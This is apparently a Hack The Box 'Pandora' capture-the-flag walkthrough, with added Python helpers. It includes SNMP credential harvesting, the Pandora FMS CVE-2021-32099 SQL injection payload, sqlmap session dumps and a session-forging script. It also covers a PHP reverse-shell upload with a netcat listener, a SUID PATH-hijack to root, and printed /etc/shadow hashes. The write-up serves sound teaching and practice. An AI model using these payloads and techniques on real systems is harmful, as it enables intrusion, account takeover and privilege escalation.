Hack-The-Box-walkthrough[pandora]

Introduction

OS: Linux
Difficulty: Easy
Points: 20
Release: 08 Jan 2022
IP: 10.10.11.136


Enumeration

NMAP

┌──(root💀kali)-[~/hackthebox/machine/pandora]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.136
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We see that TCP ports 22 (SSH) and 80 (HTTP) are open. Let's check what port 80 gives us.

Browsing the website, everything looks static and no dynamic content is served. There is one form for sending a message to the admins, but submitting it does nothing except reload the page. There is also no robots.txt that might reveal something useful. Maybe there are some interesting hidden directories, so let's fire up gobuster.

┌──(root💀kali)-[~/hackthebox/machine/pandora]
└─# gobuster dir -u http://10.10.11.136 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.136
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/12 00:51:23 Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 313] [--> http://10.10.11.136/assets/]

Gobuster finds nothing interesting except the /assets directory, which contains the JavaScript, CSS and image files the main site loads.

At this point we don’t have much to work with. Let’s try a UDP scan.

nmap -sU -sC -sV -v 10.10.11.136

Discovered open port 161/udp on 10.10.11.136

We get one open UDP port, 161 (SNMP). Let's see what it has to offer by running snmpwalk with the public community string.

public is the default read-only community string on most SNMP installations, which is why I tried it first; if it doesn't work, the community string may have to be brute-forced with a wordlist.

┌──(root💀kali)-[~/hackthebox/machine/pandora]
└─# snmpwalk -v 2c 10.10.11.136 -c public | grep daniel
iso.3.6.1.2.1.25.4.2.1.5.817 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
iso.3.6.1.2.1.25.4.2.1.5.1119 = STRING: "-u daniel -p HotelBabylon23"

snmpwalk returns a lot of detail, but the interesting part is the hrSWRunParameters subtree (1.3.6.1.2.1.25.4.2.1.5 in HOST-RESOURCES-MIB), which exposes the full command-line arguments of every running process. Two processes were started with daniel's password on their command line, so anyone who can read the public community has it: daniel / HotelBabylon23.
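Grepping the walk for a username we happen to know is lucky; the systematic version is to pull every hrSWRunName/hrSWRunParameters entry and flag any process whose arguments look like a credential. The script below is an added example written for this write-up, not part of the original post or of any tool used in it. It parses saved snmpwalk output offline: pipe `snmpwalk -v2c -c public 10.10.11.136 1.3.6.1.2.1.25.4.2.1 | python3 snmp_creds.py` into it (the file name is illustrative), or run it bare to use the constructed sample. In the sample, the two credential lines are the ones the box returned; the process names and the remaining rows are made up for the demo.

```python
import re
from typing import Dict, List

# HOST-RESOURCES-MIB hrSWRunTable, numeric form as snmpwalk prints it when no
# MIBs are loaded ("iso." stands in for the leading "1."):
#   ...25.4.2.1.2.<pid> = hrSWRunName        (process name)
#   ...25.4.2.1.5.<pid> = hrSWRunParameters  (full argument string)
LINE_RE = re.compile(
    r'^(?:iso|\.?1)\.3\.6\.1\.2\.1\.25\.4\.2\.1\.(?P<col>[25])\.(?P<pid>\d+)'
    r'\s*=\s*STRING:\s*"(?P<val>.*)"\s*$'
)

# Heuristics for secrets on a command line. They over-match on purpose
# ("-p" is also a port flag for many tools); a human reviews the hits.
SECRET_RES = [
    # "-p SECRET", "-pSECRET", "-P SECRET" (mysql, host_check, smbclient style)
    re.compile(r'''(?:^|\s)-[pP]\s*(?P<secret>"[^"]*"|'[^']*'|\S+)'''),
    # --password=SECRET, passwd=SECRET, PGPASSWORD=SECRET, token:SECRET ...
    re.compile(r'''(?i)(?:pass(?:word|wd)?|pwd|secret|token)\s*[=:]\s*(?P<secret>"[^"]*"|'[^']*'|\S+)'''),
]
# "-u NAME" / "--user NAME" / "--username=NAME": the account the secret belongs to
USER_RE = re.compile(r'(?:^|\s)(?:-u|--user(?:name)?)[\s=]+(?P<user>\S+)')


def parse_hr_swrun(snmpwalk_output: str) -> Dict[int, Dict[str, str]]:
    """Map pid -> {"name": hrSWRunName, "args": hrSWRunParameters}."""
    procs: Dict[int, Dict[str, str]] = {}
    for line in snmpwalk_output.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # other OIDs, Hex-STRING values, "No more variables", ...
        entry = procs.setdefault(int(m.group("pid")), {"name": "", "args": ""})
        entry["name" if m.group("col") == "2" else "args"] = m.group("val")
    return procs


def find_leaked_credentials(snmpwalk_output: str) -> List[dict]:
    """Return the processes whose argument string looks like it carries a secret."""
    findings = []
    for pid, proc in sorted(parse_hr_swrun(snmpwalk_output).items()):
        secrets = [
            m.group("secret").strip("'\"")          # drop shell quoting around the value
            for rx in SECRET_RES
            for m in rx.finditer(proc["args"])
        ]
        if not secrets:
            continue
        user_match = USER_RE.search(proc["args"])
        findings.append({
            "pid": pid,
            "name": proc["name"],
            "user": user_match.group("user") if user_match else None,
            "secrets": secrets,
            "args": proc["args"],
        })
    return findings


# Constructed sample: the two credential lines are what snmpwalk returned on the
# box; the process names and the other rows are made up for this demo.
SAMPLE_WALK = """\
iso.3.6.1.2.1.25.4.2.1.2.1 = STRING: "systemd"
iso.3.6.1.2.1.25.4.2.1.2.817 = STRING: "sh"
iso.3.6.1.2.1.25.4.2.1.2.1119 = STRING: "host_check"
iso.3.6.1.2.1.25.4.2.1.2.1200 = STRING: "sshd"
iso.3.6.1.2.1.25.4.2.1.5.1 = STRING: ""
iso.3.6.1.2.1.25.4.2.1.5.817 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
iso.3.6.1.2.1.25.4.2.1.5.1119 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.1200 = STRING: "-D"
"""

if __name__ == "__main__":
    import sys
    text = SAMPLE_WALK if sys.stdin.isatty() else sys.stdin.read()
    for f in find_leaked_credentials(text):
        print(f'pid {f["pid"]} ({f["name"]}): user={f["user"]} secrets={f["secrets"]}')
```

The same OIDs are also readable with `snmpwalk -v2c -c public <host> hrSWRunParameters` once the HOST-RESOURCES-MIB is loaded; the point is that process arguments are part of what a read-only community string hands out, which is why secrets on command lines end up in enumeration output like this.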

Let's SSH into the box with the obtained credentials. The user daniel does not have any interesting privileges. /etc/passwd shows one other regular user, matt, who might have more (user.txt turns out to be in his home directory). Looking around the system, alongside the static website we saw earlier there is another web application called pandora. The Apache sites-enabled config shows no externally reachable virtual host for it, but a curl request from the victim itself shows something interesting.

daniel@pandora:~$ curl http://localhost
<meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/">

So the Pandora console is only served to requests coming from localhost. Let's create an SSH local port forward to port 80 on the box so that we can reach it from our machine (binding local port 80 requires root on the attacking machine; otherwise forward a high port such as 8080 and browse to http://127.0.0.1:8080 instead).

ssh -L 80:localhost:80 daniel@10.10.11.136

The pandora console opens and asks for credentials.

Common credentials such as admin/admin and admin/password don't work. A quick search shows that Pandora FMS is a monitoring system, and the version is printed at the bottom of the login page: v7.0NG.742. Searching for exploits for that exact version brings up a very interesting article.

  • Pandora FMS 742: Critical Code Vulnerabilities Explained

This article gives a detailed explanation of the underlying vulnerability: the session_id parameter of include/chart_generator.php reaches a SQL query against the session table without sanitisation, so an unauthenticated request can inject a fake session row whose data field names admin. Using this SQL injection we can bypass the login page and get admin access.

Use the following exploit:

  • CVE-2021-32099

Just access the following URL (the injected string is session data in PHP's serialization format, which the console deserialises as our session):

http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=' union SELECT 1,2,'id_usuario|s:5:"admin";' as data -- SgGO

Then go back to /pandora_console/ and refresh: the browser's PHPSESSID now maps to the injected admin session and we are in.

Alternatively, point sqlmap at the same parameter and dump the tsessions_php table, which holds the live sessions (including admin's); setting our PHPSESSID cookie to one of those IDs has the same effect.

┌──(root💀kali)-[~/hackthebox/machine/pandora]
└─# sqlmap --url="http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=''" -D pandora -T tsessions_php --dump
......
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: session_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: session_id=-4214' OR 7546=7546#

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: session_id=''' OR (SELECT 8036 FROM(SELECT COUNT(*),CONCAT(0x716b7a6a71,(SELECT (ELT(8036=8036,1))),0x7176716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HLHR

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: session_id=''' AND (SELECT 1534 FROM (SELECT(SLEEP(5)))VpEy)-- vAqO
---

Database: pandora
Table: tsessions_php
[49 entries]
+----------------------------+------------------------------------------------------+-------------+
| id_session | data | last_active |
+----------------------------+------------------------------------------------------+-------------+
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel"; | 1638783555 |
| 0ahul7feb1l9db7ffp8d25sjba | NULL | 1638789018 |
| 11umescohevmlgeoq1e6clrp4v | id_usuario|s:6:"daniel"; | 1641955048 |
| 1um23if7s531kqf5da14kf5lvm | NULL | 1638792211 |
| 2e25c62vc3odbppmg6pjbf9bum | NULL | 1638786129 |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel"; | 1638540332 |
| 3me2jjab4atfa5f8106iklh4fc | NULL | 1638795380 |
| 4f51mju7kcuonuqor3876n8o02 | NULL | 1638786842 |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel"; | 1638535373 |
| 5682e0ou1l66p921j3p93hngea | NULL | 1641959327 |
| 59qae699l0971h13qmbpqahlls | NULL | 1638787305 |
| 5bhrjn4ei51vtt33vp18p42sj4 | NULL | 1641959245 |
| 5fihkihbip2jioll1a8mcsmp6j | NULL | 1638792685 |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel"; | 1638281946 |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel"; | 1641195617 |
| 6rjav587a3lafqum2oifkvptan | NULL | 1641959355 |
| 81f3uet7p3esgiq02d4cjj48rc | NULL | 1623957150 |
| 82k8g5avplsdj83s0mkqkp77l0 | NULL | 1641959280 |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel"; | 1638446321 |
| 8upeameujo9nhki3ps0fu32cgd | NULL | 1638787267 |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel"; | 1638881787 |
| a3a49kc938u7od6e6mlip1ej80 | NULL | 1638795315 |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel"; | 1638881664 |
| cojb6rgubs18ipb35b3f6hf0vp | NULL | 1638787213 |
| d0carbrks2lvmb90ergj7jv6po | NULL | 1638786277 |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel"; | 1641200284 |
| fikt9p6i78no7aofn74rr71m85 | NULL | 1638786504 |
| fj5973s4hsdkl25lskua24hbsa | NULL | 1641958908 |
| fqd96rcv4ecuqs409n5qsleufi | NULL | 1638786762 |
| fvt8eacn87b0um261o6itg0fns | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0; | 1641959362 |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel"; | 1638783230 |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1638796349 |
| gf40pukfdinc63nm5lkroidde6 | NULL | 1638786349 |
| heasjj8c48ikjlvsf1uhonfesv | NULL | 1638540345 |
| hf67p6grm46nvkc89t9jfu8pvo | id_usuario|s:6:"daniel"; | 1641959232 |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel"; | 1638168492 |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel"; | 1638456173 |
| k4gk31co9jovifc0h7dpdjjhmd | NULL | 1641959269 |
| kp90bu1mlclbaenaljem590ik3 | NULL | 1638787808 |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL | 1638796348 |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel"; | 1638540482 |
| ogmrr1pttk20cm1rjjv5buu6s4 | NULL | 1641959258 |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel"; | 1637667827 |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel"; | 1638168416 |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL | 1638787723 |
| r097jr6k9s7k166vkvaj17na1u | NULL | 1638787677 |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel"; | 1638889082 |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel"; | 1638547193 |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel"; | 1638793297 |
+----------------------------+------------------------------------------------------+-------------+
......
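Both the UNION payload above and the sqlmap dump deal with the data column of tsessions_php, which is PHP's native session format: `name|<serialized value>` pairs such as `id_usuario|s:5:"admin";`. The following is an added example, not code from the post or from Pandora FMS: a small decoder for that format (enough for the strings, ints, bools, nulls and arrays seen here), the matching encoder to forge a session row for any username, a builder that reproduces the UNION structure of the URL above in URL-encoded form (the column layout is taken from that working payload, not verified against the Pandora source), and a filter that picks the live session IDs belonging to a given user out of a dump. The sample rows are copied from the dump above.

```python
import urllib.parse
from typing import Any, Dict, List, Optional, Tuple


def _unserialize(s: str, i: int) -> Tuple[Any, int]:
    """Decode one PHP-serialized value at s[i]; return (value, index after it).
    Covers the types that appear in session data here: N, b, i, s and a."""
    t = s[i]
    if t == "N":                                   # N;
        return None, i + 2
    if t in ("b", "i"):                            # b:0;  i:42;
        end = s.index(";", i)
        raw = s[i + 2:end]
        return (raw == "1" if t == "b" else int(raw)), end + 1
    if t == "s":                                   # s:5:"admin";
        colon = s.index(":", i + 2)
        length = int(s[i + 2:colon])               # byte length; ASCII assumed here
        start = colon + 2                          # skip :"
        return s[start:start + length], start + length + 2   # skip ";
    if t == "a":                                   # a:2:{key;value;key;value;}
        colon = s.index(":", i + 2)
        count = int(s[i + 2:colon])
        j = colon + 2                              # skip :{
        arr: Dict[Any, Any] = {}
        for _ in range(count):
            key, j = _unserialize(s, j)
            val, j = _unserialize(s, j)
            arr[key] = val
        return arr, j + 1                          # skip }
    raise ValueError(f"unsupported PHP type {t!r} at offset {i}")


def parse_php_session(data: str) -> Dict[str, Any]:
    """Parse PHP's default session_serialize_handler ("php") format:
    key|<serialized value>key|<serialized value>... (no separator between pairs)."""
    out: Dict[str, Any] = {}
    i = 0
    while i < len(data):
        bar = data.index("|", i)
        key = data[i:bar]
        out[key], i = _unserialize(data, bar + 1)
    return out


def php_serialize(value: Any) -> str:
    """Inverse of _unserialize for the same subset of types."""
    if value is None:
        return "N;"
    if isinstance(value, bool):                    # before int: bool is an int subclass
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    raise TypeError(f"cannot serialize {type(value).__name__}")


def build_session_data(username: str, extra: Optional[Dict[str, Any]] = None) -> str:
    """Forge the data column of a tsessions_php row for the given user."""
    fields: Dict[str, Any] = {"id_usuario": username, **(extra or {})}
    return "".join(f"{k}|{php_serialize(v)}" for k, v in fields.items())


def build_injection_url(base: str, username: str) -> str:
    """Same UNION structure as the URL used above, URL-encoded, for any username."""
    payload = f"' union SELECT 1,2,'{build_session_data(username)}' as data -- x"
    return (f"{base}/pandora_console/include/chart_generator.php?session_id="
            + urllib.parse.quote(payload, safe=""))


# Constructed from the sqlmap dump above: (id_session, data, last_active).
SAMPLE_ROWS: List[Tuple[str, Optional[str], int]] = [
    ("0ahul7feb1l9db7ffp8d25sjba", None, 1638789018),
    ("11umescohevmlgeoq1e6clrp4v", 'id_usuario|s:6:"daniel";', 1641955048),
    ("fvt8eacn87b0um261o6itg0fns", 'id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0;', 1641959362),
    ("g4e01qdgk36mfdh90hvcc54umq", 'id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0;', 1638796349),
]


def sessions_for_user(rows, username: str) -> List[str]:
    """Session IDs (newest first) whose data deserializes to the given user.
    Any one of them can be set as the PHPSESSID cookie to ride that session."""
    hits = []
    for sid, data, last_active in rows:
        if not data:
            continue                               # NULL data: session never logged in
        if parse_php_session(data).get("id_usuario") == username:
            hits.append((last_active, sid))
    return [sid for _, sid in sorted(hits, reverse=True)]


if __name__ == "__main__":
    print(build_injection_url("http://127.0.0.1", "admin"))
    print("admin sessions:", sessions_for_user(SAMPLE_ROWS, "admin"))
```

The decoder is also what tells the two approaches apart: the UNION route never touches a stored row (the forged data is returned by our own query and deserialised on the spot), while the sqlmap route reuses a row that already exists, so it only works while an admin session is still live in the table.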

After logging in as admin, we snoop around a bit and see that there is a file upload option. The console is written in PHP, so let's use the good old php-reverse-shell (pentestmonkey's), edited to point at our IP and port 1234.

Go to Admin tools -> File manager.

We upload the shell, start a listener on port 1234 on our machine (the port configured in the shell) and then browse to the uploaded file:

1
http://localhost/pandora_console/images/php-reverse-shell.php

Voila! The web server runs as matt, so we get a reverse shell as matt and can read user.txt. Great!!!

┌──(root💀kali)-[~/hackthebox/machine/pandora]
└─# nc -lvp 1234
listening on [any] 1234 ...
10.10.11.136: inverse host lookup failed: Unknown host
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.136] 49270
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
13:23:38 up 14 min, 1 user, load average: 0.00, 0.03, 0.08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
daniel pts/0 10.10.14.3 13:09 13:52 0.05s 0.05s -bash
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
$ whoami
matt
$ python -c 'import pty; pty.spawn("/bin/bash")'
/bin/sh: 3: python: not found
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
matt@pandora:/$
matt@pandora:/home/matt$ cat user.txt
48d4ff3d5d47803c2e69216fb3a7cee9

To get a proper shell, we generate an SSH key pair, write the public key into /home/matt/.ssh/authorized_keys from the reverse shell, and log in with the private key:

┌──(root💀kali)-[~/hackthebox/machine/pandora]
└─# ssh -i id_rsa matt@10.10.11.136
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Wed 12 Jan 14:40:31 UTC 2022

System load: 0.14 Processes: 262
Usage of /: 63.0% of 4.87GB Users logged in: 2
Memory usage: 8% IPv4 address for eth0: 10.10.11.136
Swap usage: 0%

=> /boot is using 91.8% of 219MB


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Jan 12 14:39:39 2022 from 10.10.17.32
matt@pandora:~$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
matt@pandora:~$ whoami
matt

After logging in, the first thing we do is transfer linpeas.sh to the target and run it. linpeas gives plenty of juicy info, but the most eye-catching item is a binary called pandora_backup with the SUID bit set (the same thing can be found by hand by listing SUID files with find).

Looking at the strings in the binary, we see that it shells out to tar to create a backup of the Pandora console (the binary's own banner says as much). tar is called by bare name rather than by absolute path, so it is resolved through the PATH of whoever runs the binary; because the binary runs with root's effective uid, that is a classic PATH hijacking primitive.

We create a file named tar in our home directory containing /bin/sh, make it executable, prepend our current directory to PATH and run the binary. The SUID binary spawns our fake tar, which is a shell running as root, and we can read the last flag in /root. Two caveats: the fake tar has no shebang, but sh falls back to running it as a script, which is enough here; and if the shell you pick drops its effective uid (bash does when euid != uid unless started with -p), use sh or bash -p. Note that only the uid is raised, the gid is still matt's.

matt@pandora:~$ echo "/bin/sh" > tar
matt@pandora:~$ chmod +x tar
matt@pandora:~$ export PATH=$(pwd):$PATH
matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
# id
uid=0(root) gid=1000(matt) groups=1000(matt)
# whoami
root
# cat /root/root.txt
956517a857308a1537fd51418aa48805
# cat /etc/shadow
root:$6$HM2preufywiCDqbY$XPrZFWf6w08MKkjghhCPBkxUo2Ag5xvZYOh4iD4XcN4zOVbWsdvqLYbznbUlLFxtC/.Z0oe9D6dT0cR7suhfr.:18794:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::
sys:*:18659:0:99999:7:::
sync:*:18659:0:99999:7:::
games:*:18659:0:99999:7:::
man:*:18659:0:99999:7:::
lp:*:18659:0:99999:7:::
mail:*:18659:0:99999:7:::
news:*:18659:0:99999:7:::
uucp:*:18659:0:99999:7:::
proxy:*:18659:0:99999:7:::
www-data:*:18659:0:99999:7:::
backup:*:18659:0:99999:7:::
list:*:18659:0:99999:7:::
irc:*:18659:0:99999:7:::
gnats:*:18659:0:99999:7:::
nobody:*:18659:0:99999:7:::
systemd-network:*:18659:0:99999:7:::
systemd-resolve:*:18659:0:99999:7:::
systemd-timesync:*:18659:0:99999:7:::
messagebus:*:18659:0:99999:7:::
syslog:*:18659:0:99999:7:::
_apt:*:18659:0:99999:7:::
tss:*:18659:0:99999:7:::
uuidd:*:18659:0:99999:7:::
tcpdump:*:18659:0:99999:7:::
landscape:*:18659:0:99999:7:::
pollinate:*:18659:0:99999:7:::
usbmux:*:18789:0:99999:7:::
sshd:*:18789:0:99999:7:::
systemd-coredump:!!:18789::::::
matt:$6$JYpB9KogYA60PG6X$dU7jHpb3MIYYg0evztbE8Xw8dx7ok5/U0PaDT63FgQTwyJFr9DbaLa0WzeZGMFd05hrNCnoP5xTUr7Mkl2gNx1:18794:0:99999:7:::
lxd:!:18789::::::
Debian-snmp:!:18789:0:99999:7:::
mysql:!:18789:0:99999:7:::
daniel:$6$f4POti4xJyVf3/yD$7/efpNYDq.baYycVczUb4b5LlEBNami3//4TbI6lPNK2MaWPrqbdvAhLdMrfHnnZATY59rLgr4DeEZ3U8S41l/:18964:0:99999:7:::
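The pandora_backup bug is a general pattern: a setuid binary that runs a helper by bare name via system(), popen() or execvp() resolves it through the caller's PATH. This added example (not from the post, and not the real binary; the sample blob is a constructed stand-in, and the file name in the usage note is illustrative) automates the check that linpeas and strings did by hand: it walks a tree for setuid files, extracts printable strings without needing the external strings tool, and flags strings that look like command lines starting with a bare program name. Hits are leads for a human, not proof: the heuristic cannot see whether the binary resets PATH before calling system().

```python
import os
import re
import stat
from typing import Dict, List

# Minimal "strings": runs of at least 4 printable ASCII bytes.
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")

# A string that looks like a shell command line whose first word is a bare
# program name (letters first, no slash). Such a word is resolved through PATH.
CMD_LINE_RE = re.compile(r"^(?P<cmd>[A-Za-z][\w.+-]*)(?:\s+(?P<args>\S.*))?$")
OPTION_RE = re.compile(r"(?:^|\s)-{1,2}[A-Za-z]")
KNOWN_TOOLS = {
    "tar", "cp", "mv", "rm", "cat", "sh", "bash", "gzip", "zip", "unzip",
    "mysqldump", "chmod", "chown", "find", "xargs", "curl", "wget",
    "python", "python3", "perl", "ssh", "scp", "rsync", "service", "systemctl",
}


def extract_strings(blob: bytes) -> List[str]:
    """Printable runs in a binary, like strings(1) with its default length."""
    return [m.group().decode("ascii") for m in PRINTABLE_RUN.finditer(blob)]


def flag_bare_commands(strings: List[str]) -> List[str]:
    """Strings that look like a command run by bare name.
    Heuristic: first word is a well-known tool, or it is followed by option flags."""
    flagged = []
    for s in strings:
        m = CMD_LINE_RE.match(s.strip())
        if not m:
            continue                      # absolute paths, symbols, messages with ':' ...
        cmd, args = m.group("cmd"), m.group("args") or ""
        if cmd in KNOWN_TOOLS or (args and OPTION_RE.search(args)):
            flagged.append(s.strip())
    return flagged


def find_suid(root: str, root_owned_only: bool = True) -> List[str]:
    """Regular files under root with the setuid bit (optionally only root-owned)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)       # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not (st.st_mode & stat.S_ISUID):
                continue
            if root_owned_only and st.st_uid != 0:
                continue
            hits.append(path)
    return sorted(hits)


def audit_suid_binaries(root: str = "/", root_owned_only: bool = True) -> Dict[str, List[str]]:
    """Map each setuid binary to the bare-name command lines found inside it."""
    report: Dict[str, List[str]] = {}
    for path in find_suid(root, root_owned_only):
        try:
            with open(path, "rb") as fh:
                blob = fh.read()
        except OSError:
            continue                      # unreadable setuid binaries (mode 4711) are skipped
        flagged = flag_bare_commands(extract_strings(blob))
        if flagged:
            report[path] = flagged
    return report


# Constructed stand-in for what strings(1) might show on a backup helper; NOT the
# real pandora_backup binary.
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"PandoraFMS Backup Utility\x00"
    + b"Now attempting to backup PandoraFMS client\x00"
    + b"tar -cvf /root/pandora-backup.tar.gz /var/www/pandora/pandora_console/*\x00"
    + b"/usr/bin/gzip -9 /root/pandora-backup.tar\x00"       # absolute path: not flagged
    + b"setreuid\x00system\x00libc.so.6\x00GCC: (Ubuntu 9.4.0-1ubuntu1~20.04)\x00"
)

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "/usr"
    for path, cmds in audit_suid_binaries(root).items():
        print(path)
        for c in cmds:
            print("   ", c)
```

Run it as `python3 suid_path_audit.py /usr/bin` on the box; a hit like `tar -cvf ...` inside a root-owned setuid file is exactly the pandora_backup situation. The fix on the defending side is the mirror image of the attack: call helpers by absolute path and set a known PATH (or drop privileges) before any system()/exec*p call.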

Summary of knowledge

  • SNMP enumeration with snmpwalk (hrSWRunParameters leaks process arguments) to get daniel's SSH password
  • SSH local port forwarding to reach the localhost-only Pandora FMS console
  • Pandora FMS 742 unauthenticated SQL injection in chart_generator.php (CVE-2021-32099) to get an admin session
  • Upload of php-reverse-shell.php through the File manager to get a reverse shell as matt
  • PATH hijacking of the tar call in the SUID pandora_backup binary to obtain root

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I'm lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…